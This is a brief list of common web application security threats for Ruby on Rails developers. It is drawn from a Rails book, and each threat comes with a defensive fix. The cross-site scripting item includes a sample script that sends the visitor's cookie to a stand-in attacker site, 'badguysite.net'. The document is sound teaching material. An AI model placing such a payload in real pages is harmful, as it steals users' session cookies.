Overview of Security Threats

Here is a list of common security threats. None of these are just specific to web applications developed with Ruby on Rails. This list is summarized from Agile Web Development with Rails by Dave Thomas et al.

• SQL Injection. Inserting destructive SQL code in URL or data that gets passed to the database. Solution: sanitize contents (add needed escape characters) that is passed to the database.
• Creating Records from Form Parameters. Example: if model has an admin property, an attacker could add an extra parameter gaining admin priveleges. Solution: set attr_protected :admin in model so that the admin property must be set separately.
• Trusting ID Parameters. Users may edit the URL to request records that do not belong to them. Use the find method to only retrieve records that belong to the user.
• Exposed Controller Methods. Unless the controller method maps to a request, make sure all controller methods are declared protected or private.
• Cross-site scripting. This attack involves stealing a user's cookie by having the vulnerable site send revealing javascript code to the victim's browser:

	<script>
           document.location="http://badguysite.net/steal/" + document.cookie
	</script>
      

A web application should sanitize (provide escapes for less-than brackets) all user-submitted content that is sent to browsers.

• File uploads. Make sure that user-uploaded files are not placed among requested pages.
• Keeping sensitive information around. Don't let sensitive information persist (e.g. in the session variable) unless it is encrypted.
• Using SSL. Rails has a plug-in for SSL, which encrypts requests that are sent between the browser and server.
• Don't Cache Authenticated Pages.